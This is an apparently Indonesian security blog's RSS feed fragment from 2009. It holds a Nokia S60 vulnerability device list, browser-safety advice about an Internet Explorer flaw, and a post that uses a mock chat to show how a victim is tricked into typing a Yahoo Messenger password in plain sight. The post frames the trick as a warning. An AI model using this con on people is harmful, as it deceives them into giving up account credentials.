Nokia 6121 classic<br />
Nokia 6120 classic<br />
Nokia 6110 Navigator<br />
Nokia 5700 XpressMusic</p>
<p>S60 3rd Edition, initial release (S60 3.0):<br />
Nokia E70<br />
Nokia E65<br />
Nokia E62<br />
Nokia E61i<br />
Nokia E61<br />
Nokia E60<br />
Nokia E50<br />
Nokia N93i<br />
Nokia N93<br />
Nokia N92<br />
Nokia N91 8GB<br />
Nokia N91<br />
Nokia N80<br />
Nokia N77<br />
Nokia N73<br />
Nokia N71<br />
Nokia 5500<br />
Nokia 3250</p>
<p>S60 2nd Edition, Feature Pack 3 (S60 2.8):<br />
Nokia N90<br />
Nokia N72<br />
Nokia N70</p>
<p>S60 2nd Edition, Feature Pack 2 (S60 2.6):<br />
Nokia 6682<br />
Nokia 6681<br />
Nokia 6680<br />
Nokia 6630</p>
<p>Change History<br />
==============</p>
<p>December 30, 2008:<br />
Removed auth details since they are no longer required</p>
<p>December 21, 2008:<br />
Corrected version numbers for S60 2nd Edition</p>
<p>December 13, 2008:<br />
S60 2.8 devices react like S60 3.1 devices, not like S60 2.6 or 3.0<br />
devices</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/06/nokia-series-60-vulnerability/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Cara mudah mendapatkan password Yahoo lewat YM</title>
		<link>http://williamblog.web.id/2009/01/06/cara-mudah-mendapatkan-password-yahoo-lewat-ym/</link>
		<comments>http://williamblog.web.id/2009/01/06/cara-mudah-mendapatkan-password-yahoo-lewat-ym/#comments</comments>
		<pubDate>Tue, 06 Jan 2009 14:40:44 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[Security]]></category>

		<category><![CDATA[Special craps]]></category>

		<category><![CDATA[password]]></category>

		<category><![CDATA[yahoo]]></category>

		<category><![CDATA[ym]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=14</guid>
		<description><![CDATA[Hacking biasanya selalu dikaitkan dengan software yang canggih, baru dan muktakhir!! kali ini hacking dilakukan dengan mudah, dapat dilakukan oleh siapa saja!!

gw kasih ilustrasinya:




me
: woi bos ternyata Yahoo!Messenger tu hebat banget loh!!


korban
: hebat apanya??


me
: neh gw praktekin ya,,



korban
: apaan si??


me
: ******


me
: gimana??


korban
: gimana apanya?? cuman keliatan *****


me
: tadi tu gw ketik password gw


korban
: ahhh gw [...]]]></description>
			<content:encoded><![CDATA[<p>Hacking biasanya selalu dikaitkan dengan software yang canggih, baru dan muktakhir!! kali ini hacking dilakukan dengan mudah, dapat dilakukan oleh siapa saja!!</p>
<p><span id="more-14"></span></p>
<p>gw kasih ilustrasinya:</p>
<blockquote>
<table border="0" bordercolor="transparent">
<tbody>
<tr>
<td width="15%">me</td>
<td>: woi bos ternyata Yahoo!Messenger tu hebat banget loh!!</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: hebat apanya??</td>
</tr>
<tr>
<td width="15%">me</td>
<td>: neh gw praktekin ya,,</td>
<td></td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: apaan si??</td>
</tr>
<tr>
<td width="15%">me</td>
<td>: ******</td>
</tr>
<tr>
<td width="15%">me</td>
<td>: gimana??</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: gimana apanya?? cuman keliatan *****</td>
</tr>
<tr>
<td width="15%">me</td>
<td>: tadi tu gw ketik password gw</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: ahhh gw keliatan ***** doank koq!!</td>
</tr>
<tr>
<td width="15%">me</td>
<td>: nah itu hebatnya YM!! jadi klo kita ga sengaja ketik password kita, maka akan disensor ama YMnya!!</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: hah??hebat banget</td>
</tr>
<tr>
<td width="15%">me</td>
<td>: keren kan, loe coba dah</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: gw coba ya</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: inipasswordgwdiym</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: gimana??</td>
</tr>
<tr>
<td width="15%">me</td>
<td>:wuihhh bintang-bintang semua bos!! cakep2,,keren ya!</td>
</tr>
<tr>
<td width="15%">korban</td>
<td>: banget!!!hahaha</td>
</tr>
</tbody>
</table>
</blockquote>
<p>soooo,,,hacking bukan hanya bermodalkan software canggih doank!berhati-hatilah!!</p>
<p>Thanks for r3ck0rd 2 shared this information</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/06/cara-mudah-mendapatkan-password-yahoo-lewat-ym/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Don&#8217;t use IE</title>
		<link>http://williamblog.web.id/2009/01/06/dont-use-ie/</link>
		<comments>http://williamblog.web.id/2009/01/06/dont-use-ie/#comments</comments>
		<pubDate>Tue, 06 Jan 2009 14:30:43 +0000</pubDate>
		<dc:creator>w2vx3r</dc:creator>
		
		<category><![CDATA[News]]></category>

		<category><![CDATA[Updates]]></category>

		<category><![CDATA[Vulnerabilities]]></category>

		<category><![CDATA[Web]]></category>

		<category><![CDATA[browser]]></category>

		<category><![CDATA[IE]]></category>

		<category><![CDATA[Internet Explorer]]></category>

		<category><![CDATA[Security]]></category>

		<category><![CDATA[website]]></category>

		<guid isPermaLink="false">http://williamblog.web.id/?p=7</guid>
		<description><![CDATA[&#8211;Remove from kerak_jigong
&#8211;Created at Desember 18 2008
Semerbak bagaikan parfum, berita tentang celah/vulnerabe pada IE langsung mewarnai berbagai media internet bahkan media televisi (klo ga salah kemaren ada di metro tv)  Sebenernya vulnerabe seperti apa si??
 Pada situs security favorit saya diberitakan &#8220;Microsoft - Hole Exploit Endangers All IE Versions&#8221;. Terdapat celah pada mesin IE [...]]]></description>
			<content:encoded><![CDATA[<p>&#8211;Remove from <a href="http://tech.groups.yahoo.com/group/kerak_jigong/message/380">kerak_jigong</a></p>
<p>&#8211;Created at Desember 18 2008</p>
<p>Semerbak bagaikan parfum, berita tentang celah/vulnerabe pada IE langsung mewarnai berbagai media internet bahkan media televisi (klo ga salah kemaren ada di metro tv)  Sebenernya vulnerabe seperti apa si??</p>
<p><span id="more-7"></span> Pada situs security favorit saya diberitakan &#8220;Microsoft - Hole Exploit Endangers All IE Versions&#8221;. Terdapat celah pada mesin IE sehingga dapat dilakukan exploitasi/pengambilan alih oleh para hacker (black hat tentunya). Apa saja yang bisa dambil?? Banyak!! Layaknya pengambilan alih, berarti semua data dalam IE dapat diambil, bahkan mungkin bisa mengambil semua isi harddisk anda!!(mungkin loh) Exploitasi dapat dilakukan apabila pengguna mengunjungi suatu situs yang telah terinfeksi oleh entah suatu virus, atau malware(singkatan dari malicious software yang artinya program2 yang merugikan) lainnya sehingga ketika itu juga program jahat akan menggunakan celah(hole) dalam IE sehingga,,,bang!!! gotcha!!You&#8217;re the target!! LoL!</p>
<p>Ahhh,,,saya kan pakai IE ga nyimpen password atau berkunjung ke situs- situs aneh,,, Ga semua proses dalam membuka suatu website diketahui oleh kita, ada saja website yang baik tiba-tiba sudah dimasuki virus (contoh nyatanya seperti ilmukomputer.com yang bisa dimasuki virus yang akhrinya banyak kehilangan database mereka) bahkan ga smua mengecek URL yang ada di browser pada saat mengunjungi suatu situs, misalnya ketika bermain di warnet dan ingin mengunjungi friendster.com, ketika mengetikkan &#8220;www.f&#8221; maka akan muncul tampilan solusi pada browser yang pada akhirnya kita memilih menggunakan solusi tersebut kan?? bagaimana jika URL tersebut bukan www.friendster.com melainkan www.friensdster.com, dimana di www.friensdster.com sudah disisipi virus???</p>
<p>Kembali ke topik,,bahkan beberapa pakar menyarankan untuk berpindah ke browser lainya sementara Microsoft akan meng-patch IE. Pertanyaannya,,,pindah kemana??? Mozila kah?? Opera kah?? Safari kah?? chrome kan?? Baru tadi pagi gw dapet berita bahwa Opera melakukan Update &#8220;Opera Releases Update For Extremely Severe Vuln&#8221; sehingga pengguna Software Opera diwajibkan mengupgrade ke versi baru!! Ditambah lagi berita bertubi-tubi datang untuk firefox untuk masalah keamanannya!! berita tersebut</p>
<p>&#8212;Vuln: Mozilla Firefox/Thunderbird/SeaMonkey Multiple Remote Vulnerabilities</p>
<p>&#8212;Vuln: Mozilla Firefox MathML XHTML Null Pointer Dereference Denial of Service Vulnerability</p>
<p>Dan belum ada pemberitahuan untuk update MOzila sampai sekarang,,,  tidak lain juga dengan safari dan chrome yang terdapat bug dan masih belum stabil.  lalu bagaimana?? ga mungkin kita ga ngenet menunggu browser yang aman kan??</p>
<p>kiat-kiatnya:</p>
<p>&#8211;pacth selalu browser anda, toh cuman makan waktu bentar</p>
<p>&#8211;jangan malas mengetik URL!!(kebiasaan menular yang gw juga sering melakukannya)</p>
<p>&#8211;selama proses pengerjaan suatu website &#8220;berpassword&#8221; entah itu friendster, facebook(hahaha yang pake facebook siap2 kena virus Koobface yaaa), internet banking, paypal, studentsite, usahakan hanya membuka website itu saja sampai &#8220;Logout&#8221; barulah membuka web lain!!</p>
<p>&#8211;Ga usah install yang macem-macem lah di browser kalian(sepeti plug- in, widgets), tapi klo memang perlu tugas anda yaaa mengupdate terus plug-in2 tersebut,,karena dari plugin tersebut bisa menyebabkan browser kalian menjadi vulnerabe!!</p>
<p>18 des 2008-</p>
]]></content:encoded>
			<wfw:commentRss>http://williamblog.web.id/2009/01/06/dont-use-ie/feed/</wfw:commentRss>
		</item>
	</channel>
</rss>
